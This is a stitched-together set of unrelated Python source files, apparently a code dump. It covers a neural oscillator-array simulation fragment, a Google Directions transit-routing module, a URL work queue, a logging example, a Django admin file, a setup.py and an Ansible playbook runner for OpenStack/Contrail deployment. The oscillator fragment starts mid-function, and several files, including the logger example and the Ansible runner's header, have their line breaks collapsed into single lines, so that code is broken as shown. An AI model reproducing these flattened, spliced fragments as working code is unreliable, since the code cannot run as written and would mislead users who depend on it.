'order':0, } )->np.ndarray: """rtrn x vals for normal weighted abt 0hz # distinct vals for replace = false """ # range discerned by eye fig 1 fitting a&c x = np.linspace(params['b']-3.5*params['c'], params['b']+3.5*params['c'], int(1e6) ) #this just uses nominal 0th dertivative to return gaussian and normalize prob = self.kernel.wavelet(self.kernel.gaussian, x, *params.values(), True ) prob = prob/np.sum(prob) # pdf for weights from max-normalized wavelet rng = np.random.default_rng() frequency = rng.choice(x, size=np.prod(self.ic.shape), p = prob, replace=True, ) print('\nmean natural frequency in hz:', np.round(np.mean(frequency),3), '\nstdev:', np.round(np.std(frequency),3), '\nconverted to phase angle [-pi,pi] on output' ) # t --> [-pi pi) return frequency*np.pi def uniform_initial_conditions(self, m:int = 16, n:int = 16, )->np.ndarray: """return random 2D phase array""" scale = np.max(np.absolute(self.domain)) offset = np.min(self.domain) # print(scale, offset) rng = np.random.default_rng() return scale*rng.random((m,n)) + offset def distance(self, t:str = 'float') -> np.ndarray: """construct m*n*(m*n) array of euclidian distance as integer or float this could be optimized but is only called once as opposed to eth phase difference calc """ d = np.zeros([self.ic.shape[0]*self.ic.shape[1], self.ic.shape[1]*self.ic.shape[0]]) u,v = np.meshgrid(np.arange(self.ic.shape[0]), np.arange(self.ic.shape[1]), sparse=False, indexing='xy') u = u.ravel() v = v.ravel() z = np.array([u,v]).T for (k,x) in enumerate(z): d[k,:] = np.array(np.sqrt((u - x[0])**2 + (v - x[1])**2),dtype=t) return d # d = np.zeros([self.ic.shape[0]*self.ic.shape[1], # self.ic.shape[1], # self.ic.shape[0]]) # # # k=0 # for j in np.arange(self.ic.shape[1]): # for i in np.arange(self.ic.shape[0]): # # print(i*j,j,i) # d[k,...] 
= self.indiv_distance((i,j),integer) # k+=1 # return d # def indiv_distance(self, # indx:tuple = (0,0), # integer:bool = False, # ) -> np.ndarray: # ###construct m*n array of euclidian distance as integer or float # # x,y = np.meshgrid(np.arange(self.ic.shape[0]), # np.arange(self.ic.shape[1]), # sparse=False, indexing='xy') # # # print('dx:\n',(indx[0] - x), # '\ndy:\n',(indx[1] - y), # '\nsq(dx^2+dy^2):\n', # np.sqrt((indx[0] - x)**2 + (indx[1] - y)**2), # '\n') # # # if not integer: # return np.sqrt((indx[0] - x)**2 + (indx[1] - y)**2) # else: # return np.asarray(np.sqrt((indx[0] - x)**2 + (indx[1] - y)**2),dtype = int) def main(): """ this demos a random contour plot """ corticalArray = oscillatorArray((64,64),(-np.pi,np.pi),1) x = np.linspace(0,corticalArray.ic.shape[0], corticalArray.ic.shape[1]) y = np.linspace(0,corticalArray.ic.shape[1], corticalArray.ic.shape[0]) x,y = np.meshgrid(x,y) phase_array = np.asarray([x.ravel(), y.ravel(), corticalArray.ic.ravel()] ).T corticalArray.plot_phase(phase_array, 'Oscillator Phase $\in$ [-$\pi$,$\pi$)', 'Location y', 'Location x' ) if __name__ == '__main__': main()
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

import urllib
from datetime import datetime
import time
import json

from alex.applications.PublicTransportInfoEN.site_preprocessing import expand_stop
from alex.tools.apirequest import APIRequest
from alex.utils.cache import lru_cache


class Travel(object):
    """Holder for starting and ending point (and other parameters) of travel."""

    def __init__(self, **kwargs):
        """Initializing (just filling in data).

        Accepted keys: from_city, from_stop, to_city, to_stop, vehicle,
        max_transfers."""
        self.from_stop_geo = kwargs['from_stop_geo']
        self.to_stop_geo = kwargs['to_stop_geo']
        self.from_city = kwargs['from_city']
        # '__ANY__'/'none' (and 'dontcare' for vehicle/transfers) are
        # wildcard slot values from the dialogue manager -- stored as None.
        self.from_stop = kwargs['from_stop'] if kwargs['from_stop'] not in ['__ANY__', 'none'] else None
        self.to_city = kwargs['to_city']
        self.to_stop = kwargs['to_stop'] if kwargs['to_stop'] not in ['__ANY__', 'none'] else None
        self.vehicle = kwargs['vehicle'] if kwargs['vehicle'] not in ['__ANY__', 'none', 'dontcare'] else None
        self.max_transfers = (kwargs['max_transfers']
                              if kwargs['max_transfers'] not in ['__ANY__', 'none', 'dontcare']
                              else None)

    def get_minimal_info(self):
        """Return minimal waypoints information in the form of a stringified
        inform() dialogue act."""
        res = []
        # Cities are only worth mentioning when they differ, or when exactly
        # one endpoint has a concrete stop.
        if self.from_city != self.to_city or (bool(self.from_stop) != bool(self.to_stop)):
            res.append("inform(from_city='%s')" % self.from_city)
        if self.from_stop is not None:
            res.append("inform(from_stop='%s')" % self.from_stop)
        if self.from_city != self.to_city or (bool(self.from_stop) != bool(self.to_stop)):
            res.append("inform(to_city='%s')" % self.to_city)
        if self.to_stop is not None:
            res.append("inform(to_stop='%s')" % self.to_stop)
        if self.vehicle is not None:
            res.append("inform(vehicle='%s')" % self.vehicle)
        if self.max_transfers is not None:
            res.append("inform(num_transfers='%s')" % str(self.max_transfers))
        return '&'.join(res)


class Directions(Travel):
    """Ancestor class for transit directions, consisting of several routes."""

    def __init__(self, **kwargs):
        # Waypoint data may come wrapped in a Travel object or directly as
        # keyword arguments.
        if 'travel' in kwargs:
            super(Directions, self).__init__(**kwargs['travel'].__dict__)
        else:
            super(Directions, self).__init__(**kwargs)
        self.routes = []

    def __getitem__(self, index):
        return self.routes[index]

    def __len__(self):
        return len(self.routes)

    def __repr__(self):
        ret = ''
        for i, route in enumerate(self.routes, start=1):
            ret += "ROUTE " + unicode(i) + "\n" + route.__repr__() + "\n\n"
        return ret


class Route(object):
    """Ancestor class for one transit direction route."""

    def __init__(self):
        self.legs = []

    def __repr__(self):
        ret = ''
        for i, leg in enumerate(self.legs, start=1):
            ret += "LEG " + unicode(i) + "\n" + leg.__repr__() + "\n"
        return ret


class RouteLeg(object):
    """One traffic directions leg."""

    def __init__(self):
        self.steps = []

    def __repr__(self):
        return "\n".join(step.__repr__() for step in self.steps)


class RouteStep(object):
    """One transit directions step -- walking or using public transport.
    Data members:
    travel_mode -- TRANSIT / WALKING

    * For TRANSIT steps:
    departure_stop
    departure_time
    arrival_stop
    arrival_time
    headsign -- direction of the transit line
    vehicle -- type of the transit vehicle (tram, subway, bus)
    line_name -- name or number of the transit line

    * For WALKING steps:
    duration -- estimated walking duration (seconds)
    """

    MODE_TRANSIT = 'TRANSIT'
    MODE_WALKING = 'WALKING'

    def __init__(self, travel_mode):
        self.travel_mode = travel_mode
        # Only the fields relevant to the given mode are initialised.
        if self.travel_mode == self.MODE_TRANSIT:
            self.departure_stop = None
            self.departure_time = None
            self.arrival_stop = None
            self.arrival_time = None
            self.headsign = None
            self.vehicle = None
            self.line_name = None
        elif self.travel_mode == self.MODE_WALKING:
            self.duration = None

    def __repr__(self):
        ret = self.travel_mode
        if self.travel_mode == self.MODE_TRANSIT:
            ret += ': ' + self.vehicle + ' ' + self.line_name + \
                   ' [^' + self.headsign + ']: ' + self.departure_stop + \
                   ' ' + str(self.departure_time) + ' -> ' + \
                   self.arrival_stop + ' ' + str(self.arrival_time)
        elif self.travel_mode == self.MODE_WALKING:
            # duration is in seconds; distance attribute is optional.
            ret += ': ' + str(self.duration / 60) + ' min, ' + \
                   ((str(self.distance) + ' m') if hasattr(self, 'distance') else '')
        return ret


class DirectionsFinder(object):
    """Abstract ancestor for transit direction finders."""

    def get_directions(self, from_city, from_stop, to_city, to_stop,
                       departure_time=None, arrival_time=None, parameters=None):
        """
        Retrieve the transit directions from the given stop to the given stop
        at the given time.

        Should be implemented in derived classes.
        """
        raise NotImplementedError()


class GoogleDirections(Directions):
    """Traffic directions obtained from Google Maps API."""

    def __init__(self, input_json={}, **kwargs):
        # NOTE(review): mutable default argument -- harmless here because it
        # is never mutated, but a None sentinel would be the safer idiom.
        super(GoogleDirections, self).__init__(**kwargs)
        for route in input_json['routes']:
            g_route = GoogleRoute(route)
            # if VEHICLE is defined, than route must be composed of walking and VEHICLE transport
            if kwargs['travel'].vehicle is not None and kwargs['travel'].vehicle not in ['__ANY__', 'none', 'dontcare']:
                route_vehicles = set([step.vehicle
                                      for leg in g_route.legs
                                      for step in leg.steps if hasattr(step, "vehicle")])
                # Reject routes that use another vehicle or mix vehicles.
                if len(route_vehicles) != 0 and (len(route_vehicles) > 1 or kwargs['travel'].vehicle not in route_vehicles):
                    continue
            # if MAX_TRANSFERS is defined, than the route must be composed of walking and limited number of transport steps
            if kwargs['travel'].max_transfers is not None and kwargs['travel'].max_transfers not in ['__ANY__', 'none', 'dontcare']:
                num_transfers = len([step
                                     for leg in g_route.legs
                                     for step in leg.steps if step.travel_mode == GoogleRouteLegStep.MODE_TRANSIT])
                if num_transfers > int(kwargs['travel'].max_transfers) + 1:
                    continue
            self.routes.append(g_route)


class GoogleRoute(Route):
    """One route parsed from the Google Directions JSON response."""

    def __init__(self, input_json):
        super(GoogleRoute, self).__init__()
        for leg in input_json['legs']:
            self.legs.append(GoogleRouteLeg(leg))


class GoogleRouteLeg(RouteLeg):
    """One leg of a Google route; total distance is kept in meters."""

    def __init__(self, input_json):
        super(GoogleRouteLeg, self).__init__()
        for step in input_json['steps']:
            self.steps.append(GoogleRouteLegStep(step))
        self.distance = input_json['distance']['value']


class GoogleRouteLegStep(RouteStep):
    """One step of a Google route leg (transit or walking)."""

    # Maps Google vehicle-type identifiers to the internal vehicle names.
    VEHICLE_TYPE_MAPPING = {
        'RAIL': 'train',
        'METRO_RAIL': 'tram',
        'SUBWAY': 'subway',
        'TRAM': 'tram',
        'MONORAIL': 'monorail',
        'HEAVY_RAIL': 'train',
        'COMMUTER_TRAIN': 'train',
        'HIGH_SPEED_TRAIN': 'train',
        'BUS': 'bus',
        'INTERCITY_BUS': 'bus',
        'TROLLEYBUS': 'bus',
        'SHARE_TAXI': 'bus',
        'FERRY': 'ferry',
        'CABLE_CAR': 'cable_car',
        'GONDOLA_LIFT': 'ferry',
        'FUNICULAR': 'cable_car',
        'OTHER': 'dontcare',
        'Train': 'train',
        'Long distance train': 'train'
    }

    def __init__(self, input_json):
        self.travel_mode = input_json['travel_mode']
        if self.travel_mode == self.MODE_TRANSIT:
            data = input_json['transit_details']
            self.departure_stop = data['departure_stop']['name']
            self.departure_time = datetime.fromtimestamp(data['departure_time']['value'])
            self.arrival_stop = data['arrival_stop']['name']
            self.arrival_time = datetime.fromtimestamp(data['arrival_time']['value'])
            self.headsign = data['headsign']
            # sometimes short_name not present
            if not 'short_name' in data['line']:
                self.line_name = data['line']['name']
            else:
                self.line_name = data['line']['short_name']
            # Fall back to the vehicle display name when 'type' is missing.
            vehicle_type = data['line']['vehicle'].get('type', data['line']['vehicle']['name'])
            self.vehicle = self.VEHICLE_TYPE_MAPPING.get(vehicle_type, vehicle_type.lower())
            # normalize stop names
            self.departure_stop = expand_stop(self.departure_stop)
            self.arrival_stop = expand_stop(self.arrival_stop)
            self.num_stops = data['num_stops']
        elif self.travel_mode == self.MODE_WALKING:
            self.duration = input_json['duration']['value']
            self.distance = input_json['distance']['value']


class GoogleDirectionsFinder(DirectionsFinder, APIRequest):
    """Transit direction finder using the Google Maps query engine."""

    def __init__(self, cfg):
        DirectionsFinder.__init__(self)
        APIRequest.__init__(self, cfg, 'google-directions', 'Google directions query')
        self.directions_url = 'https://maps.googleapis.com/maps/api/directions/json'
        # Optional API key enables the "premium" query parameters below.
        if 'key' in cfg['DM']['directions'].keys():
            self.api_key = cfg['DM']['directions']['key']
        else:
            self.api_key = None

    @lru_cache(maxsize=10)
    def get_directions(self, waypoints, departure_time=None, arrival_time=None):
        """Get Google maps transit directions between the given stops
        at the given time and date.

        The time/date should be given as a datetime.datetime object.
        Setting the correct date is compulsory!
        """
        # TODO: refactor - eliminate from_stop,street,city,borough and make from_place, from_area and use it as:
        # TODO: from_place = from_stop || from_street1 || from_street1&from_street2
        # TODO: from_area = from_borough || from_city
        # Origin is either a lat/lon pair or "stop, city" text.
        parameters = list()
        if not waypoints.from_stop_geo:
            from_waypoints = [expand_stop(waypoints.from_stop, False),
                              expand_stop(waypoints.from_city, False)]
            parameters.extend([wp for wp in from_waypoints if wp and wp != 'none'])
        else:
            parameters.append(waypoints.from_stop_geo['lat'])
            parameters.append(waypoints.from_stop_geo['lon'])
        origin = ','.join(parameters).encode('utf-8')

        # Same for the destination.
        parameters = list()
        if not waypoints.to_stop_geo:
            to_waypoints = [expand_stop(waypoints.to_stop, False),
                            expand_stop(waypoints.to_city, False)]
            parameters.extend([wp for wp in to_waypoints if wp and wp != 'none'])
        else:
            parameters.append(waypoints.to_stop_geo['lat'])
            parameters.append(waypoints.to_stop_geo['lon'])
        destination = ','.join(parameters).encode('utf-8')

        data = {
            'origin': origin,
            'destination': destination,
            'region': 'us',
            'alternatives': 'true',
            'mode': 'transit',
            'language': 'en',
        }
        if departure_time:
            data['departure_time'] = int(time.mktime(departure_time.timetuple()))
        elif arrival_time:
            data['arrival_time'] = int(time.mktime(arrival_time.timetuple()))
        # add "premium" parameters
        if self.api_key:
            data['key'] = self.api_key
            if waypoints.vehicle:
                data['transit_mode'] = self.map_vehicle(waypoints.vehicle)
            data['transit_routing_preference'] = 'fewer_transfers' if waypoints.max_transfers else 'less_walking'

        self.system_logger.info("Google Directions request:\n" + str(data))

        page = urllib.urlopen(self.directions_url + '?' + urllib.urlencode(data))
        response = json.load(page)
        self._log_response_json(response)
        directions = GoogleDirections(input_json=response, travel=waypoints)
        self.system_logger.info("Google Directions response:\n" + unicode(directions))
        return directions

    def map_vehicle(self, vehicle):
        """maps PTIEN vehicle type to GOOGLE DIRECTIONS query vehicle"""
        # any of standard google inputs
        if vehicle in ['bus', 'subway', 'train', 'tram', 'rail']:
            return vehicle
        # anything on the rail
        # NOTE(review): 'monorail' is listed twice in this membership test.
        if vehicle in ['monorail', 'night_tram', 'monorail']:
            return 'rail'
        # anything on the wheels
        if vehicle in ['trolleybus', 'intercity_bus', 'night_bus']:
            return 'bus'
        # dontcare
        return 'bus|rail'


def _todict(obj, classkey=None):
    """Convert an object graph to dictionary.

    Adapted from:
    http://stackoverflow.com/questions/1036409/recursively-convert-python-object-graph-to-dictionary .
    """
    if isinstance(obj, dict):
        # Recurse into dict values in place.
        for k in obj.keys():
            obj[k] = _todict(obj[k], classkey)
        return obj
    elif hasattr(obj, "__keylist__"):
        data = {key: _todict(obj[key], classkey)
                for key in obj.__keylist__ if not callable(obj[key])}
        if classkey is not None and hasattr(obj, "__class__"):
            data[classkey] = obj.__class__.__name__
        return data
    elif hasattr(obj, "__dict__"):
        data = {key: _todict(value, classkey)
                for key, value in obj.__dict__.iteritems() if not callable(value)}
        if classkey is not None and hasattr(obj, "__class__"):
            data[classkey] = obj.__class__.__name__
        return data
    elif hasattr(obj, "__iter__"):
        return [_todict(v, classkey) for v in obj]
    else:
        return obj
python
from multiprocessing import Queue
from urlobj import URLObj
import logging


class WorkQueue():
    """Process-safe FIFO of URLObj work items with crash dump/restore."""

    def __init__(self):
        # Specify maxsize when multithreading.
        self.queue = Queue()
        self.loaded = False

    # Semantics:
    # Puts 'urlo' into the queue. If there's no free space, it will block
    # until there is free space.
    def enqueue(self, urlo):
        self.queue.put(urlo, True)

    # Semantics:
    # Gets a urlobj from the queue. If there's nothing in the queue, it will
    # block until there's something there. I don't expect this to block
    # very often.
    def dequeue(self):
        return self.queue.get(True)

    def empty(self):
        return self.queue.empty()

    # Only called if we have an exception; writes the queue out to a file.
    def dump(self):
        """Drain the queue into queuedsites.txt, one '<>'-separated record per line."""
        logging.info("Dumping queue")
        with open('queuedsites.txt', 'w') as f:
            while not self.empty():
                u = self.dequeue()
                f.write('{}<>{}<>{}<>{}<>{}<>{}\n'.format(u.url, u.xhash,
                        u.status_code, u.timedout, u.to_enqueue, u.is_domain))

    # Only called at the beginning; assumes we were interrupted in the middle of a run.
    def load(self):
        """Re-enqueue every record dumped by dump() and mark the queue loaded."""
        logging.info("Loading queue")
        with open('queuedsites.txt', 'r') as f:
            for line in f:
                line = line.strip().split('<>')
                if not line:
                    continue
                # XXX Sometimes we have lines that aren't all the data from the URLObj?
                elif len(line) < 6:
                    # logging.warn is a deprecated alias of warning.
                    logging.warning("Found queued URL with less than 6 params: {}".format(line[0]))
                    continue
                u = URLObj(line[0])
                u.xhash = line[1]
                u.status_code = int(line[2])
                # BUG FIX: bool("False") is True -- any non-empty string is
                # truthy.  dump() wrote str(True/False), so compare against
                # the literal 'True' to round-trip the flags correctly.
                u.timedout = (line[3] == 'True')
                u.to_enqueue = (line[4] == 'True')
                u.is_domain = (line[5] == 'True')
                self.enqueue(u)
        # BUG FIX: was "self.queue.loaded = True", which tagged the
        # multiprocessing.Queue object instead of updating the flag that
        # __init__ initialised on this WorkQueue.
        self.loaded = True
python
""" Example logger file. I've found this doesn't work on bluehost, unless you set up the handler thus: http_handler = logging.handlers.HTTPHandler( 'example.com', 'http://example.com/path_to_logger/api_upload?key=test&other_keys...', method='GET', ) """ import logging import logging.handlers logger = logging.getLogger() http_handler = logging.handlers.HTTPHandler( 'localhost:5000', '/api_upload?key=test&project_id=0&submitter=me&[email protected]', method='GET', ) http_handler.setLevel(logging.DEBUG) # probably not a good idea... logger.addHandler(http_handler) logger.debug('Test of debug level.') logger.info('Test of info level.') logger.warning('Test of warning level.') logger.error('Test of error level.') logger.critical('Test of critical level.')
python
#!/usr/bin/env python3
"""Stub script that will check whether the machine has enough free memory."""


def main():
    """Checks if there's enough free memory in the computer.

    TODO: implement the actual check (e.g. read /proc/meminfo or use
    os.sysconf) -- currently a no-op placeholder that returns None.
    """


if __name__ == '__main__':
    # BUG FIX: the call was unguarded, so importing this module ran the
    # script body.  The standard guard keeps the module importable.
    main()
python
from django.contrib import admin

# Explicit imports instead of "from .models import *" so the registered
# models are visible to readers and linters, and nothing unexpected is
# pulled into this namespace.
from .models import (Usuario, Media, Ramo, Cliente, Colaborador, Pedido,
                     Solicitacao, Post)

# Expose each model in the Django admin with the default ModelAdmin.
admin.site.register(Usuario)
admin.site.register(Media)
admin.site.register(Ramo)
admin.site.register(Cliente)
admin.site.register(Colaborador)
admin.site.register(Pedido)
admin.site.register(Solicitacao)
admin.site.register(Post)
python
from setuptools import setup, find_packages

# Console-script entry point: `autowheel` invokes autowheel.autowheel:main.
entry_points = """
[console_scripts]
autowheel = autowheel.autowheel:main
"""

# Read the long description with a context manager so the file handle is
# closed deterministically (a bare open().read() leaks the handle until GC
# and raises ResourceWarning under -W error).
with open('README.rst') as readme_file:
    long_description = readme_file.read()

setup(name='autowheel',
      version='0.1.dev0',
      description='Automatically build wheels from PyPI releases',
      long_description=long_description,
      install_requires=['click', 'cibuildwheel', 'requests', 'pyyaml'],
      author='Thomas Robitaille',
      author_email='[email protected]',
      license='BSD',
      url='https://github.com/astrofrog/autowheel',
      entry_points=entry_points,
      packages=find_packages())
python
import os import sys import urllib import multiprocessing import ConfigParser import tempfile import yaml import re from collections import namedtuple from ansible.parsing.dataloader import DataLoader from ansible.vars import VariableManager from ansible.inventory import Inventory from ansible.executor.playbook_executor import PlaybookExecutor from ansible.utils.display import Display from sm_ansible_utils import * from sm_ansible_utils import _valid_roles from sm_ansible_utils import _inventory_group from sm_ansible_utils import _container_names from sm_ansible_utils import SM_STATUS_PORT from sm_ansible_utils import STATUS_IN_PROGRESS from sm_ansible_utils import STATUS_VALID from sm_ansible_utils import STATUS_SUCCESS from sm_ansible_utils import STATUS_FAILED sys.path.append(os.path.join(os.path.dirname(__file__), '..')) from server_mgr_logger import ServerMgrlogger as ServerMgrlogger # wrapper class inspired from # http://docs.ansible.com/ansible/developing_api.html # This class runs openstack playbooks followed by contrail ansible playbooks to # deploy openstack and contrail nodes in sequence. 
class ContrailAnsiblePlaybooks(multiprocessing.Process):
    """Child process that runs kolla (OpenStack) and contrail Ansible
    playbooks in sequence for one provisioning request.

    NOTE(review): this is Python 2 era code (`urllib.urlencode`,
    `dict.iteritems`, Ansible 2.3-style VariableManager/Inventory APIs) —
    keep it on the interpreter/Ansible versions it was written for.
    """

    def __init__(self, json_entity, args):
        """Store the provisioning request and pre-declare playbook state.

        json_entity -- list whose first element carries the request:
                       "hosts_in_inv", "parameters", "tasks", "cluster_id"
                       (schema inferred from usage below — confirm with caller).
        args        -- server-manager argument object; ansible_srvr_ip and
                       playbook defaults are read from it later.
        """
        super(ContrailAnsiblePlaybooks, self).__init__()
        try:
            self.logger = ServerMgrlogger()
        # NOTE(review): bare except deliberately keeps the process alive when
        # the logger cannot be initialized; failure is noted in a debug file.
        except:
            f = open("/var/log/contrail-server-manager/debug.log", "a")
            f.write("Ansible Callback Init - ServerMgrlogger init failed\n")
            f.close()

        # Initialize common stuff
        self.json_entity = json_entity
        self.args = args
        self.hosts_in_inv = json_entity[0]["hosts_in_inv"]
        # Kolla hosts are only known when a kolla inventory was supplied;
        # otherwise self.hosts_in_kolla_inv stays unset (update_status(kolla=True)
        # would then raise AttributeError — presumably callers guarantee this).
        if "kolla_inv" in json_entity[0]["parameters"]:
            self.hosts_in_kolla_inv = \
                SMAnsibleUtils(self.logger).hosts_in_kolla_inventory(\
                    json_entity[0]['parameters']['kolla_inv'])
        # Task list arrives as a comma/space separated string.
        self.tasks = re.split(r'[,\ ]+', json_entity[0]["tasks"])

        # Initialize vars required for Ansible Playbook APIs
        self.options = None
        self.extra_vars = None
        self.pbook_path = None
        self.var_mgr = None
        self.inventory = None
        self.pb_executor = None

    def update_status(self, kolla=False):
        """PUT self.current_status for every host to the server manager.

        kolla -- when True report against the kolla inventory hosts,
                 otherwise against the plain inventory hosts.
        """
        if kolla:
            hosts = self.hosts_in_kolla_inv
        else:
            hosts = self.hosts_in_inv
        for h in hosts:
            status_resp = { "server_id" : h, "state" : self.current_status }
            SMAnsibleUtils(self.logger).send_REST_request(
                self.args.ansible_srvr_ip,
                SM_STATUS_PORT, "ansible_status",
                urllib.urlencode(status_resp),
                method='PUT', urlencode=True)

    def validate_provision_params(self, inv, defaults):
        """Validate/patch the "[all:vars]" section of an inventory dict.

        Missing well-known keys are filled in from `defaults` (mutates
        `inv` in place); any other default attribute not present in the
        section is copied over too. Returns STATUS_VALID on success, or an
        error string describing what is missing/unreadable.
        """
        keys_to_check = ["ansible_playbook", "docker_insecure_registries",
                         "docker_registry_insecure"]
        params = inv.get("[all:vars]", None)
        if params == None:
            return ("[all:vars] not defined")
        for x in keys_to_check:
            if not x in params.keys():
                if x == "docker_insecure_registries":
                    params['docker_insecure_registries'] = \
                        defaults.docker_insecure_registries
                elif x == 'docker_registry_insecure':
                    params['docker_registry_insecure'] = \
                        defaults.docker_registry_insecure
                elif x == 'ansible_playbook':
                    params['ansible_playbook'] = \
                        defaults.ansible_playbook
                else:
                    # Unreachable for the current keys_to_check, but kept as a
                    # guard if the list grows without a matching default.
                    return ("%s not defined in inventory" % x)
        # Back-fill every remaining default attribute (Python 2 iteritems).
        for k,v in vars(defaults).iteritems():
            if not k in params.keys():
                params[k] = v
        pbook = params['ansible_playbook']
        # Existence/readability check only — the handle is closed immediately.
        try:
            with open(pbook) as file:
                pass
        except IOError as e:
            return ("Playbook not found : %s" % pbook)
        return STATUS_VALID

    def create_kolla_param_files(self, pw, glbl, pbook_dir):
        """Write kolla passwords.yml and globals.yml next to the playbooks.

        pw/glbl   -- dicts dumped as YAML into etc/kolla/ under pbook_dir/..
        pbook_dir -- directory containing the kolla playbooks.

        The try/except around the read is effectively a probe for whether the
        file already exists (merge logic is commented out); the write in
        `finally` always happens, overwriting the file either way.
        """
        self.logger.log(self.logger.INFO,"Changing globals and passwords files")
        pw_file_name = pbook_dir + '/../etc/kolla/passwords.yml'
        try:
            with open(pw_file_name) as kolla_pws:
                #SMAnsibleUtils(self.logger).merge_dict(pw, yaml.load(kolla_pws))
                self.logger.log(self.logger.INFO,
                                "Creating %s" % (pw_file_name))
        except IOError as e :
            self.logger.log(self.logger.INFO,
                            "%s : Creating %s" % (e, pw_file_name))
        finally:
            with open(pw_file_name, 'w+') as kolla_pws:
                yaml.dump(pw, kolla_pws, explicit_start=True,
                          default_flow_style=False, width=1000)

        gl_file_name = pbook_dir + '/../etc/kolla/globals.yml'
        try:
            with open(gl_file_name) as kolla_globals:
                #SMAnsibleUtils(self.logger).merge_dict(glbl,
                #                                       yaml.load(kolla_globals))
                self.logger.log(self.logger.INFO,
                                "Creating %s" % (gl_file_name))
        except IOError as e :
            self.logger.log(self.logger.INFO,
                            "%s : Creating %s" % (e, gl_file_name))
        finally:
            with open(gl_file_name, 'w+') as kolla_globals:
                yaml.dump(glbl, kolla_globals, explicit_start=True,
                          default_flow_style=False, width=1000)

    def run_playbook(self, pb, kolla, action):
        """Build an inventory and run one playbook named by parameter key `pb`.

        pb     -- key into parameters holding the playbook path
                  (e.g. "kolla_deploy_pb").
        kolla  -- True for kolla/OpenStack playbooks (extra vars come from the
                  generated globals/passwords YAML), False for contrail.
        action -- kolla action string; also becomes the reported status.

        Returns the executor's aggregate stats object on success, or None on
        failure (status already reported via update_status).
        """
        cluster_id = self.json_entity[0]["cluster_id"]
        parameters = self.json_entity[0]["parameters"]
        self.pbook_path = parameters[pb]
        pbook_dir = os.path.dirname(self.pbook_path)
        inv_dir = pbook_dir + '/inventory/'
        ev = None
        no_run = parameters["no_run"]
        try:
            if kolla:
                inv_file = inv_dir + cluster_id + "_kolla.inv"
                inv_dict = parameters["kolla_inv"]
                kolla_pwds = parameters['kolla_passwords']
                kolla_vars = parameters['kolla_globals']
                self.create_kolla_param_files(kolla_pwds, kolla_vars,
                                              pbook_dir)
                # Extra vars = action + everything from the two YAML files
                # just written above.
                # NOTE(review): yaml.load without an explicit Loader — only
                # safe because these files are generated locally just above.
                ev = { 'action': action }
                with open(pbook_dir + '/../etc/kolla/globals.yml') as info:
                    ev.update(yaml.load(info))
                with open(pbook_dir + '/../etc/kolla/passwords.yml') as info:
                    ev.update(yaml.load(info))
            else:
                inv_file = inv_dir + cluster_id + ".inv"
                inv_dict = parameters["inventory"]
                # Validation result (STATUS_VALID or an error string) is
                # reported as the current status for contrail runs.
                self.current_status = self.validate_provision_params(inv_dict,
                                                                     self.args)
            # Ansible 2.x CLI options emulated via a namedtuple.
            Options = namedtuple('Options',
                                 ['connection', 'forks', 'module_path',
                                  'become', 'become_method', 'become_user',
                                  'check', 'listhosts', 'listtasks',
                                  'listtags', 'syntax', 'verbosity',
                                  'extra_vars'])
            self.options = Options(connection='ssh', forks=100,
                                   module_path=None, become=True,
                                   become_method='sudo', become_user='root',
                                   check=False, listhosts=None,
                                   listtasks=None, listtags=None,
                                   syntax=None, verbosity=None,
                                   extra_vars=ev)
            self.logger.log(self.logger.INFO,
                            "Creating inventory %s for playbook %s" %
                            (inv_file, self.pbook_path))
            SMAnsibleUtils(None).create_inv_file(inv_file, inv_dict)
            self.logger.log(self.logger.INFO,
                            "Created inventory %s for playbook %s" %
                            (inv_file, self.pbook_path))
            # Dry-run mode: inventory is written but nothing is executed.
            if no_run:
                return
            self.var_mgr = VariableManager()
            self.inventory = Inventory(loader=DataLoader(),
                                       variable_manager=self.var_mgr,
                                       host_list=inv_file)
            self.var_mgr.set_inventory(self.inventory)
            if kolla:
                self.var_mgr.extra_vars = ev
            self.pb_executor = PlaybookExecutor(playbooks=[self.pbook_path],
                                                inventory=self.inventory,
                                                variable_manager=self.var_mgr,
                                                loader=DataLoader(),
                                                options=self.options,
                                                passwords={})
            self.logger.log(self.logger.INFO,
                            "Starting playbook %s" % self.pbook_path)
            # Update status before every playbook run
            if kolla:
                self.current_status = "openstack_" + action
            else:
                self.current_status = action
            self.update_status(kolla)
            rv = self.pb_executor.run()
            if rv != 0:
                self.current_status = STATUS_FAILED
                self.update_status(kolla)
                self.logger.log(self.logger.ERROR,
                                "Playbook Failed: %s" % self.pbook_path)
                rv = None
            else:
                # NOTE(review): reaches into a private attribute of
                # PlaybookExecutor for aggregate stats — version-fragile.
                rv = self.pb_executor._tqm._stats
        except Exception as e:
            self.logger.log(self.logger.ERROR, e)
            self.current_status = STATUS_FAILED
            self.update_status(kolla)
            rv = None
        return rv

    def run(self):
        """Process entry point: run the requested playbooks in fixed order.

        Each stage only runs when its task name is present in self.tasks;
        a None return from run_playbook (failure) aborts the sequence.
        """
        self.logger.log(self.logger.INFO,
                        "Executing Ansible Playbook Actions: %s" % self.tasks)
        if 'openstack_bootstrap' in self.tasks:
            rv = self.run_playbook("kolla_bootstrap_pb",
                                   True, "bootstrap-servers")
            if rv == None:
                return rv
        if 'openstack_deploy' in self.tasks:
            rv = self.run_playbook("kolla_deploy_pb", True, "deploy")
            if rv == None:
                return rv
        if 'openstack_post_deploy' in self.tasks:
            rv = self.run_playbook("kolla_post_deploy_pb", True, "post-deploy")
            if rv == None:
                return rv
        if 'openstack_destroy' in self.tasks:
            rv = self.run_playbook("kolla_destroy_pb", True, "destroy")
            if rv == None:
                return rv
        if 'contrail_deploy' in self.tasks:
            rv = self.run_playbook("contrail_deploy_pb", False,
                                   "contrail-deploy")
            if rv == None:
                return rv
        # This has to happen after contrail_deploy
        if 'openstack_post_deploy_contrail' in self.tasks:
            rv = self.run_playbook("kolla_post_deploy_contrail_pb",
                                   True, "post-deploy-contrail")
            if rv == None:
                return rv
python
